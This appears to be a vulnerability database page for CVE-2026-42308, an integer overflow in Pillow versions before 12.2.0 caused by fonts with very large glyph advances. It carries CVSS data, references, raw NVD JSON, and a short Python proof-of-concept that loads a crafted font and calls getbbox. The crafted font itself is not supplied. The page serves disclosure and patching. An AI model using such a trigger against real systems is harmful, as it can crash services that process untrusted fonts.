CVE-2026-42308

Description

Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:* - VULNERABLE

Pillow < 12.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys
from PIL import ImageFont

# Proof of Concept for CVE-2026-42308
# This script attempts to load a crafted font file
# that contains an excessively large glyph advance.
# This triggers the integer overflow in Pillow < 12.2.0.

# Replace 'crafted_font.ttf' with the actual malicious file path
font_path = 'crafted_font.ttf'

try:
    # Load the font
    font = ImageFont.truetype(font_path, 20)
    print("Font loaded. Attempting to trigger overflow during processing...")
    
    # Processing text with the font triggers the position tracking logic
    text = "VULNERABLE"
    # Depending on the Pillow version, this might cause a crash or hang
    # due to the integer overflow in the advance calculation.
    # textbbox or getsize calls the underlying logic.
    left, top, right, bottom = font.getbbox(text)
    print(f"Processing complete. BBox: {left}, {top}, {right}, {bottom}")

except Exception as e:
    print(f"An exception occurred (expected in vulnerable versions): {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42308
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42308
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42308/
[4] VulDB https://vuldb.com/cve/CVE-2026-42308
[5] https://github.com/python-pillow/Pillow/releases/tag/12.2.0
[6] https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42308", "sourceIdentifier": "[email protected]", "published": "2026-05-09T06:16:09.793", "lastModified": "2026-05-12T17:57:20.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pillow is a Python imaging library. Prior to version 12.2.0, if a font advances for each glyph by an exceeding large amount, when Pillow keeps track of the current position, it may lead to an integer overflow. This issue has been patched in version 12.2.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:pillow:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.2.0", "matchCriteriaId": "B0B999B7-101D-49A6-8092-BA34A3AC1AC2"}]}]}], "references": [{"url": "https://github.com/python-pillow/Pillow/releases/tag/12.2.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-wjx4-4jcj-g98j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}